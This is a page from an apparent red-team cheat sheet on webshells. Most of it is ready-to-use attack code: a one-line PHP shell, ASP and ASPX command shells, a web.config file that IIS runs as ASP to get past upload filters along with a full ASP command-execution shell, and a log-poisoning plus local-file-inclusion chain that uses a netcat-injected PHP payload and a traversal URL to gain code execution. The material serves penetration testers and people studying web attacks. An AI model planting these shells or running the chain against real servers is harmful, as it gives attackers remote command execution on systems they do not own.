Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Webshell
  • PHP 15 bytes shell
  • Asp/Aspx
  • Running web.config as an ASP file
  • Log poisoning + LFI + shell

Was this helpful?

  1. Cheat Sheet
  2. Web

Webshell

PreviousReverse-shellNext(De)Serialization

Last updated 3 years ago

Was this helpful?

Webshell

PHP 15 bytes shell

<?=`$_GET[0]`?>

Asp/Aspx

One Line ASP Shell

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

Request with: http://target/shell.asp?cmd=ipconfig

python SharPyShell.py generate -p somepassword
python SharPyShell.py interact -u http://target.url/sharpyshell.aspx -p somepassword

Running web.config as an ASP file

Sometimes IIS supports ASP files but it is not possible to upload any file with .ASP extension. In this case, it is possible to use a web.config file directly to run ASP classic codes:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
 
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>

<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>

Log poisoning + LFI + shell

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replacing highlighted data.

We can also try to add via netcat:

nc -nv 10.11.1.35 80
 (UNKNOWN) [10.11.1.35] 80 (http) open
   <?php echo shell_exec($_GET['cmd']);?>
   
HTTP/1.1 400 Bad Request

Next, get RCE by adding the cmd parameter:

http://10.11.15.137/addguestbook.php?name=aaa&comment=aaa&cmd=dir%20&LANG=../../../../../../../xampp/apache/logs/access.log%00

: SharPyShell - tiny and obfuscated ASP.NET webshell for C# web applications.

References:

Required: Initial LFI found

Reference:

😼
SharPyShell
https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
https://www.hackingarticles.in/apache-log-poisoning-through-lfi/
Logowebshell/fuzzdb-webshell/asp at master · tennc/webshellGitHub
Examples of asp webshells.
LogoGet Reverse Shell Through Log Poisoning with the Vulnerability of — LFI ( LOCAL FILE INCLUSION )Medium
LogoRCE via LFI Log Poisoning - The Death PotionMedium
LogoGitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoorGitHub